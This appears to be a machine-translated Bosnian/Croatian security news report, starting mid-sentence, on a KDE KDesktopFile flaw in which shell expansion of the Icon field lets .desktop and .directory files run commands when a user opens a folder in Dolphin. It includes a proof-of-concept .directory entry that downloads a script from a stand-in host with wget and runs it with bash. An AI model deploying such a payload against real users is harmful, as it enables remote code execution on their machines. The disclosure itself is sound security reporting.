U KDE-u , koji omogućava napadaču da izvrši proizvoljne naredbe kada korisnik pregleda direktorij ili arhivu koja sadrži posebno dizajnirane datoteke „.desktop“ i „.directory“. Napad zahtijeva da korisnik jednostavno pogleda listu datoteka u Dolphin upravitelju datoteka, preuzme zlonamjernu datoteku radne površine ili prevuče prečicu na radnu površinu ili u dokument. Problem se manifestuje u trenutnom izdanju biblioteka i starije verzije, do KDE 4. Ranjivost je i dalje prisutna (CVE nije dodijeljen).
Problem je uzrokovan neispravnom implementacijom klase KDesktopFile, koja, prilikom obrade varijable “Icon”, bez odgovarajućeg izbjegavanja, prosljeđuje vrijednost funkciji KConfigPrivate::expandString(), koja vrši proširenje specijalnih znakova ljuske, uključujući obradu stringovi “$(..)” kao naredbe koje treba izvršiti. Suprotno zahtjevima XDG specifikacije, implementacija shell konstrukcije se proizvode bez odvajanja tipa postavki, tj. ne samo pri određivanju komandne linije aplikacije koja će se pokrenuti, već i pri određivanju ikona prikazanih po defaultu.
Na primjer, da napadne pošaljite korisniku zip arhivu sa direktorijumom koji sadrži datoteku ".directory" kao što je:
[Ulazak na radnu površinu]
Type=Directory
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Kada pokušate da pogledate sadržaj arhive u Dolphin fajl menadžeru, skripta https://example.com/FILENAME.sh će biti preuzeta i izvršena.
izvor: opennet.ru